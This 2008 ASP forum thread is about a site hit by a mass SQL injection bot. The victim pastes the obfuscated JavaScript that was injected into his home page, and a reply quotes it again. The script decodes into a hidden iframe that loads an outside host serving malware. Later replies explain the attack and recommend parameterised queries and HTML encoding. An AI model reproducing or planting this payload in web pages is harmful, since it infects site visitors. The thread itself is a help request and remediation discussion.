new type of injection? rewrite default document?

Discussion in 'ASP General' started by Brian Bozarth, Jul 11, 2008.

  1. This is weird, I'm pretty familiar with SQL Injection - but we're getting
    these weird injection that is writing in the default document or home page.
    What it's doing is putting in script code at the top or bottom of the home
    page... it looks something like this:

    <script>function xy1q4877d47d91a36(q4877d47d92209){ function q4877d47d929d5
    () {return 16;} return (parseInt(q4877d47d92209,q4877d47d929d5()));}function
    q4877d47d93974(q4877d47d94144){ var q4877d47d95c9b=2; var
    q4877d47d94d7f='';q4877d47d96c3a=String.fromCharCode;for(q4877d47d954cc=0;q4877d47d954cc<q4877d47d94144.length;q4877d47d954cc+=q4877d47d95c9b){
    q4877d47d94d7f+=(q4877d47d96c3a(xy1q4877d47d91a36(q4877d47d94144.substr(q4877d47d954cc,q4877d47d95c9b))));}return
    q4877d47d94d7f;} var
    q4877d47d9740a='3C7363726970743E696628216D796961297B646F63756D656E742E777269746528756E657363617065282027253363253639253636253732253631253664253635253230253733253732253633253364253237253638253734253734253730253361253266253266253734253732253735253635253732253639253665253637253734253666253665253635253733253265253665253635253734253266253733253635253631253732253633253638253265253633253637253639253366253632253631253631253637253639253732253663262532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533352533352533352533362533372532392532622532372536342533352533322533382532372532302537372536392536342537342536382533642533312533382533312532302536382536352536392536372536382537342533642533332533302533372532302537332537342537392536632536352533642532372536342536392537332537302536632536312537392533612532302536652536662536652536352532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E';document.write(q4877d47d93974(q4877d47d9740a));</script>

    What it's doing is decoding itself into an iframe that links out to popups
    that will try and download a virus on your machine. I don't get the popup
    in my machine because i think i have a newer version of IE. But some
    people have complained that it is installing a virus on their machine.

    Also what is crazy is when I replace the file with a good version. In
    about 30 mins, it automatically overwritten with the infected version.
    Also I've noticed it on some other websites that I haven't touched.

    Has anyone encountered this before? Because I'm stumped as to the cause of
    it. I don't see the issue on our dev server. It seems to be IIS on a
    shared host.

    Brian
     
    Brian Bozarth, Jul 11, 2008
    #1
    1. Advertising

  2. It would seem you have a virus on your machine that is adding the code.

    this is just a thought I don't know it it will work, but try auditing access
    to the file. maybe then you can at least see what user the virus is running
    under. look in your task manager for processes running

    "Brian Bozarth" <> wrote in message
    news:...
    > This is weird, I'm pretty familiar with SQL Injection - but we're getting
    > these weird injection that is writing in the default document or home
    > page. What it's doing is putting in script code at the top or bottom of
    > the home page... it looks something like this:
    >
    > <script>function xy1q4877d47d91a36(q4877d47d92209){ function
    > q4877d47d929d5 () {return 16;} return
    > (parseInt(q4877d47d92209,q4877d47d929d5()));}function
    > q4877d47d93974(q4877d47d94144){ var q4877d47d95c9b=2; var
    > q4877d47d94d7f='';q4877d47d96c3a=String.fromCharCode;for(q4877d47d954cc=0;q4877d47d954cc<q4877d47d94144.length;q4877d47d954cc+=q4877d47d95c9b){
    > q4877d47d94d7f+=(q4877d47d96c3a(xy1q4877d47d91a36(q4877d47d94144.substr(q4877d47d954cc,q4877d47d95c9b))));}return
    > q4877d47d94d7f;} var
    > q4877d47d9740a='3C7363726970743E696628216D796961297B646F63756D656E742E777269746528756E657363617065282027253363253639253636253732253631253664253635253230253733253732253633253364253237253638253734253734253730253361253266253266253734253732253735253635253732253639253665253637253734253666253665253635253733253265253665253635253734253266253733253635253631253732253633253638253265253633253637253639253366253632253631253631253637253639253732253663262532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533352533352533352533362533372532392532622532372536342533352533322533382532372532302537372536392536342537342536382533642533312533382533312532302536382536352536392536372536382537342533642533332533302533372532302537332537342537392536632536352533642532372536342536392537332537302536632536312537392533612532302536652536662536652536352532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E';document.write(q4877d47d93974(q4877d47d9740a));</script>
    >
    > What it's doing is decoding itself into an iframe that links out to popups
    > that will try and download a virus on your machine. I don't get the
    > popup in my machine because i think i have a newer version of IE. But
    > some people have complained that it is installing a virus on their
    > machine.
    >
    > Also what is crazy is when I replace the file with a good version. In
    > about 30 mins, it automatically overwritten with the infected version.
    > Also I've noticed it on some other websites that I haven't touched.
    >
    > Has anyone encountered this before? Because I'm stumped as to the cause
    > of it. I don't see the issue on our dev server. It seems to be IIS on
    > a shared host.
    >
    > Brian
    >
     
    ThatsIT.net.au, Jul 13, 2008
    #2
    1. Advertising

  3. Brian Bozarth wrote:
    > This is weird, I'm pretty familiar with SQL Injection - but we're
    > getting these weird injection that is writing in the default document or
    > home
    > page. What it's doing is putting in script code at the top or bottom of
    > the
    > home page... it looks something like this:
    >


    Browse through the several threads about sql injection that have been posted
    in the last couple weeks. You should find posts that mention these links:

    http://www.aspmessageboard.com/forum/showMessage.asp?F=21&M=894997&P=1#894984
    http://isc.sans.org/diary.html?n&storyid=4294
    http://blogs.technet.com/neilcar/ar...-of-a-sql-injection-incident-part-2-meat.aspx

    In a nutshell, you've been attacked by a bot that uses google to find sites
    that might be vulnerable to sql injection, based on the use of querystrings
    in the urls. It then runs through a scripted routine to find the
    vulnerabilities in the sites, and if they exist, uses those vulnerabilities
    to insert those script tags you are seeing into every table in your
    database. Since your code is likely to be writing data tretrieved from the
    database to Response without validating or encoding it, it's really your
    code that is inserting the script tags into your pages.

    So the first thing you should do is check the data in your database. If
    corrupt, take it offline and restore a backup, or run a stored procedure
    which was posted by Old Pedant to attempt to cleanse it. Then, go through
    your server-side code with a fine tooth comb and

    1. Make your code impervious to sql injection by eliminating all use of
    dynamic sql, using parameters instead.
    See here for a better, more secure way to execute your queries by using
    parameter markers:
    http://groups-beta.google.com/group/microsoft.public.inetserver.asp.db/msg/72e36562fee7804e

    Personally, I prefer using stored procedures, or saved parameter queries
    as
    they are known in Access:

    Access:
    http://www.google.com/groups?hl=en&lr=&ie=UTF-8&oe=UTF-8&selm=

    http://groups.google.com/groups?hl=...=1&selm=


    SQL Server:

    http://groups.google.com/group/microsoft.public.inetserver.asp.general/msg/5d3c9d4409dc1701?hl=en&


    2. Use Server.HTMLEncode when writing data to Response



    --
    Microsoft MVP - ASP/ASP.NET
    Please reply to the newsgroup. This email account is my spam trap so I
    don't check it very often. If you must reply off-line, then remove the
    "NO SPAM"
     
    Bob Barrows [MVP], Jul 13, 2008
    #3
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. CJ
    Replies:
    1
    Views:
    1,619
    Andrew Thompson
    Oct 29, 2004
  2. George  Moschovitis
    Replies:
    10
    Views:
    383
    Esteban Manchado Velázquez
    Jul 26, 2005
  3. Chris Withers
    Replies:
    0
    Views:
    98
    Chris Withers
    Oct 29, 2013
  4. Chris Withers
    Replies:
    0
    Views:
    108
    Chris Withers
    Nov 27, 2013
  5. Chris Withers
    Replies:
    0
    Views:
    126
    Chris Withers
    Dec 11, 2013
Loading...

Share This Page